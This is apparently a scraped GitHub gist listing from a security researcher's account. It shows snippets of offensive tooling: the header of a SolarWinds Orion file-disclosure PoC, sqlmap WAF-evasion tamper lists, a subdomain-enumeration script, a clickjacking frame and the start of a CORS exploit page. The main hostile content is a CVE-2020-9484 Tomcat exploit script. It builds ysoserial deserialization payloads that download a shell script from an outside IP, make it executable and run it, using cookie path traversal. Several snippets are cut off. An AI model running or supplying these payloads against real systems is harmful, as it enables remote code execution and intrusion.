hexrom
engineering security
```yaml
---
# OWASP ZAP automation configuration file, for more details see https://www.zaproxy.com/docs/(TBA)
env:                                  # The environment, mandatory
  contexts:                           # List of 1 or more contexts, mandatory
    - name: context 1                 # Name to be used to refer to this context in other jobs, mandatory
      url: http://demo.testfire.net   # The top level url, mandatory, everything under this will be included
      includePaths:                   # TBA: An optional list of regexes to include
      excludePaths:                   # TBA: An optional list of regexes to exclude
      authentication:                 # TBA: In time to cover all auth configs
  parameters:
    failOnError: true                 # If set exit on an error
```
@hexrom
hexrom / Salesforce-Aura-StandardObjects.txt
Created April 27, 2022 19:08
Salesforce Aura Standard Objects
AcceptedEventRelation
Account
AccountBrand
AccountContactRelation
AccountCleanInfo
AccountContactRole
AccountInsight
AccountOwnerSharingRule
AccountPartner
AccountRelationship
@hexrom
hexrom / CVE-2020-10148.py
Created December 29, 2020 18:05 — forked from 0xsha/Solarwinds_Orion_LFD.py
CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
# @0xSha
# (C) 2020 0xSha.io
# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules
@hexrom
hexrom / gist:84c723b8658a3b5b881c67d20325418b
Created November 11, 2020 22:54
CVE-2020-9484-PoC.sh
#!/bin/bash
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 'curl http://10.10.14.22/payload.sh -o /tmp/payload.sh' > downloadPayload.session
curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload' -F 'image=@downloadPayload.session'
curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload'
sleep 1
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session
curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload' -F 'image=@chmodPayload.session'
curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload'
sleep 1
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 'bash /tmp/payload.sh' > executePayload.session
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft Access
```
@hexrom
hexrom / deepersubs.sh
Created October 30, 2019 02:34
Find deeper subdomains by automating the scanning of all found third level subdomains with Sublist3r
#!/bin/bash
# This script automates running Sublist3r against all third-level subdomains.
# Input: third-level.txt, one third-level domain per line.
# Output: thirdlevels/<domain>.txt per domain, plus an aggregated final.txt.
mkdir -p thirdlevels
echo "Gathering full third-level domains with Sublist3r..."
while read -r domain; do
  # Skip blank lines in the input file.
  [ -z "$domain" ] && continue
  sublist3r -d "$domain" -o "thirdlevels/$domain.txt"
  # Deduplicate this domain's results before appending them to the aggregate list.
  sort -u "thirdlevels/$domain.txt" >> final.txt
done < third-level.txt
echo "Probing for alive third-levels..."
@hexrom
hexrom / clickjack-poc.html
Created May 5, 2019 01:07
Clickjacking frame PoC
<!DOCTYPE html>
<html>
<frameset cols="25%, 25%">
<frame
src="https://<Affected URL>">
</frameset>
</html>
@hexrom
hexrom / cors.html
Created May 5, 2019 01:04
CORS Misconfiguration (Reflection) Exploit
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>